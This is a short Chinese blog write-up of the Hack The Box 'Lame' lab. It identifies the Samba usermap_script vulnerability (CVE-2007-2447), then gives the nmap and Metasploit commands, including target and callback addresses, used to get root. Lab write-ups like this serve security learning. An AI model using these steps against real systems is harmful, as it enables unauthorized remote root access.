0
点赞
收藏
分享

微信扫一扫

hack the box lame靶机

小磊z 2022-04-14 阅读 84
安全

首先打开靶机,给了提示,说是cve-2007-2447,搜索这个漏洞编号后,发现是一个samba漏洞,名字叫usermap_script
在这里插入图片描述
使用nmap扫描一下看看,能发现确实是存在samba的。

nmap -sV -Pn -A 10.10.10.3

在这里插入图片描述
打开msf,然后搜索usermap_script

search usermap_script

在这里插入图片描述
然后使用第一个exploit

use 0

在这里插入图片描述
查看一下需要设置哪些东西

options

在这里插入图片描述
将远程地址设置为10.10.10.3,远程的端口设置为445(才开始用139,怎么都不成功),本地的地址设置为openvpn拿到的地址

set rhosts 10.10.10.3
set rport 445
set lhost 10.10.14.30

在这里插入图片描述
启动,然后能找到root.txt

exploit

在这里插入图片描述

举报

相关推荐

hack the box jerry靶机

安全

Hack The Box -----------------------Waldo

phpsedjsonPython后端开发

Hack The Box-Jab

网络安全

[Hack The Box] HTB—Paper walkthrough

linux渗透安全polkitWordPress

hack the box-challenges:Export题解

安全

[Hack The Box] HTB—Challenges—forensics—Illumination writeup

gitgithub

Hack The Box(黑客盒子)Mongod-mongoDB工具篇

安全mongodbweb安全网络安全数据库

hack语言

日记本PHP

Lame v3.99.5

sedWindows办公效率

物理hack

linux运维服务器
0 条评论